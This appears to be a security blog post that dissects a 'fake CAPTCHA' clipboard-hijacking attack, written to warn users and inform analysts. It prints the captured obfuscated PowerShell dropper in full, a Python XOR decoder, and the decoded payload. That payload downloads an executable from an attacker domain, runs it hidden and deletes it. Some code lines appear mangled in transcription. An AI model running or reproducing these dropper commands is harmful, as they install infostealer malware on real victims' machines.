Unmasking the "Fake CAPTCHA" Attack: Deconstructing a Clipboard-Hijacking PowerShell Dropper

Social engineering tactics are constantly evolving, and one of the most insidious trends currently sweeping the web is the **Fake CAPTCHA Attack**. Unlike traditional phishing that asks for credentials, this attack tricks users into inadvertently executing malicious code directly on their own machines using their clipboard.

Recently, I captured a live sample of this attack in the wild. A user was browsing a compromised website when a random tab opened automatically, displaying a highly convincing, fake CAPTCHA verification page.

In this deep dive, we are going to tear down exactly how this attack works, analyze the obfuscated dropper script, decode the payload, and map out the threat actor's execution flow.

## 1. The Initial Compromise: Clipboard Hijacking

The attack begins with a simple, seemingly harmless instruction: "Press Win + R, Ctrl + V, and Enter to verify you are human."

When the victim clicks anywhere on the fake CAPTCHA page, a hidden JavaScript event triggers in the background. This script hijacks the operating system's clipboard and silently injects a massive, obfuscated PowerShell command into it.

If the user follows the instructions—opening the Windows Run dialog (Win + R) and pasting the contents (Ctrl + V)—they unknowingly execute a malicious downloader right under the nose of their antivirus software.

## 2. The Raw Dropper: Analyzing the Obfuscated Code

When inspecting the clipboard history (via Win + V), the following PowerShell command was discovered. This is the exact code injected by the malicious website:

```powershell

<# Verification code: EEDA49971446 #> \(w23='1dYSBiC';\)x24='15122c652b10240c4302003b1a375409771d271d6d62012b252b0a26610b303d3624225f053e363034790b373c30371b2a451d09212d1d2c520b356e193a3a42103c3e6c2726454a0a36211c31581020033006375e07363f1610335439636916053000566277215a7e7b0b303d6f3922450c79772707350b301c1e12496b6a372020360c2e1f2d167d12083759396369050c37630537372d040558083c1d230426194d70680c0c341c2d2d362f496e78103c3e16103354441d3a300c20450b2b2a62441350103173660a7011491f3c300a264d2b2c276f27365d086277265d7e7b0b303d6f3922450c7977215a63193f0a2a311d265c4a101c6c3922450c0469782e264536383d26062e770d35360c082e544c7078654e6d541c3c7465407815016c6e7252255e167177245f7e015f7d3574496e5d1079606244225f00797e2c063711403c66794d25074f727a391d31481f103d34062854490e36203b2640113c2036496e64163073654e2b4510292078466c5b0d3a3a2c1f26421034362c1d301f09363d311d26434b38232b462a5f003c2b6c192b415b386e260565450b32362c5470000568367a0a7307516861730d7705523c6373512252516a617b0a7b065c6d67755f2008056d6474587155076d6a735c7600056e36755e7655006d31750d7417172b307f1b265205292721012217073b6e2101315e093c75300c250c0c2d27321a6602257c61044c71770f3c2a38062d54083c3230076d5c0b3720360c3114561f752f062754592b3621083345073132654e631c2b2c2704002f54447d3776496e64173c11231a2a5234382131002d565f30356a3d2642107403231d2b11403d676b1267545164623f0c2f4201220036083145490a3f270c3311490a3621062d551779613f142050103a3b393a3750162d7e1105265414797e110c205e0a3d20625b3e4c5f30356a442d5e10797b160c304549093236016315006d7a6b1226490d2d2e793a3750162d7e121b2c52012a2062440558083c03231d2b11403d67624414580a3d3c353a3748083c730a002755013768361b3a4a363c3e2d1f261c2d2d362f496e7d0d2d3630082f61052d3b624d27054474152d1b2054447416301b2c43253a272b062d1137303f2707375d1d1a3c2c1d2a5f113c2e210837520c222e794e7862103821364413430b3a36311a631c33303d2606346210203f27490b58003d362c49335e133c213101265d08797e031b2444093c3d36252a421079746f272c611636352b052616487e7e15002d550b2e0036102f544375740a0027550137746e4e6e720b343e23072716487d25375f2a480362363a0037';\(y25='';for(\)z26=0;\(z26 -lt \)x24.Length;\(z26+=2){\)y25+=char};iex $y25

```

At first glance, this is gibberish. The attackers intentionally added a fake comment (<# Verification code: EEDA49971446 #>) to make it look like a legitimate system verification if the user happened to read it.

The core of the obfuscation lies in $w23 (the key) and $x24 (the hexadecimal payload).

## 3. Demystifying the Cryptography: XOR Encoding

The script uses a cryptographic technique known as **XOR (Exclusive OR) encoding**. Let's break down how it works.

### For the Beginners: What is XOR?

Imagine you have a secret message and a key. XOR is like a digital magic trick. If you mix your message with the key, it turns into completely unreadable nonsense. However, the beauty of XOR is that it is perfectly reversible. If you take that unreadable nonsense and mix it with the exact same key again, your original message pops right back out.

The attacker used the key "1dYSBiC" to scramble their malicious instructions into the long string of numbers and letters you see in $x24.

### For the Pros: Technical Breakdown

The obfuscation relies on a simple bitwise XOR operation against a static 7-byte ASCII key.

1. The script initializes an empty string $y25.

2. A for loop iterates through the hexadecimal string $x24 in chunks of 2 (representing single bytes).

3. It converts each hex pair into an integer, aligns it against the repeating string $w23 (1dYSBiC), and applies the XOR operator (^).

4. The resulting character is appended to $y25.

5. Finally, the script executes the decoded string in memory using iex (Invoke-Expression), meaning the decrypted code never actually touches the victim's hard drive.

Security analysts can rapidly decrypt payloads like this using a simple Python script:

```python

key = '1dYSBiC'

hex_str = '15122c652b10240c43...' # (Full hex string goes here)

decoded = ''

for i in range(0, len(hex_str), 2):

byte = int(hex_str[i:i+2], 16)

key_idx = (i // 2) % len(key)

key_byte = ord(key[key_idx])

decoded += chr(byte ^ key_byte)

print(decoded)

```

## 4. The Decoded Payload: The Execution Flow

Running the decryption logic reveals the true intent of the malware. Here is the unmasked PowerShell payload:

```powershell

$vu6iyg='[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;

\(c3=Join-Path \)env:TEMP ([System.IO.Path]::GetRandomFileName());

New-Item -ItemType Directory -Path $c3 -Force|Out-Null;

\(d4=Join-Path \)c3 ([System.IO.Path]::GetRandomFileName()+''.exe'');

$e5=0;

for(\(f6=0;\)f6 -lt 3 -and -not $e5;$f6++){

try{

Invoke-WebRequest -Uri ''https://jicinvestments.monster/api/index.php?a=dl&token=31a1e8c065121d446e018ac5329c8784476c9a47612dc491551a7e775dd4b7d7&src=recaptcha&cb=chrome&ref=https%3A%2F%2Fkeyzonelearn.monster%2F&mode=recaptcha'' -OutFile $d4 -UseBasicParsing;

if(Test-Path \(d4){\)e5=1}

else{Start-Sleep -Seconds 2}

}catch{Start-Sleep -Seconds 2}

};

if(-not (Test-Path $d4)){exit};

Start-Process -FilePath $d4 -WindowStyle Hidden;

try{Remove-Item -LiteralPath $d4 -Force -ErrorAction SilentlyContinue}catch{};';

Start-Process -WindowStyle Hidden powershell -ArgumentList '-NoProfile','-WindowStyle','Hidden','-Command',$vu6iyg;

exit

```

### Step-by-Step Analysis

1. **Enforcing TLS 1.2:** [System.Net.ServicePointManager]::SecurityProtocol = ... Tls12

The attacker forces PowerShell to use TLS 1.2. This ensures the connection to their malicious server doesn't fail on older Windows systems that might default to outdated protocols.

2. **Staging Area:** \(c3=Join-Path \)env:TEMP

It creates a dynamically named, hidden folder inside the user's %TEMP% directory to house the executable.

3. **The Fetch:** Invoke-WebRequest -Uri 'https://jicinvestments.monster...'

The script reaches out to a suspicious .monster domain. Notice the URL parameters: src=recaptcha and cb=chrome. The threat actors are meticulously tracking their campaigns, logging exactly which fake CAPTCHA vector and which browser resulted in a successful compromise.

4. **Persistence/Retry Logic:** The for loop attempts the download up to 3 times, sleeping for 2 seconds upon failure, ensuring maximum reliability.

5. **Stealth Execution:** Start-Process -FilePath $d4 -WindowStyle Hidden;

Once downloaded, the .exe is launched invisibly in the background. The user sees absolutely nothing.

6. **Covering Tracks:** Remove-Item -LiteralPath $d4 -Force...

Finally, it deletes the downloaded executable to thwart forensic analysis.

## 5. The Threat Landscape: What is the payload?

While the PowerShell script only acts as a "dropper" (a vehicle to bring the real malware in), the behaviors and domains (.monster TLDs) are hallmark indicators of **InfoStealers** (such as LummaC2, RedLine, or Vidar).

Given the current threat landscape, payloads delivered via this method are almost exclusively designed to quietly siphon passwords, session cookies, and—most importantly—drain browser-based cryptocurrency wallets. Once executed, the stealer zips up this data and exfiltrates it to a command-and-control server within seconds.

## Conclusion: Did you dodge the bullet?

If you ever encounter a strange page asking you to copy and paste code into a terminal, **do not do it.** However, if you only clicked the page and copied the text to inspect it (like the subject of our case study), but **did not** manually run it in CMD, Win+R, or PowerShell, **you are completely safe.** Merely having text in your clipboard does not execute code. The absence of mysterious files in your Downloads folder or random command prompt flashes confirms that the payload remained dormant.

*Always stay vigilant. The barrier between

a safe browsing session and total system compromise is often just a simple Ctrl+V.*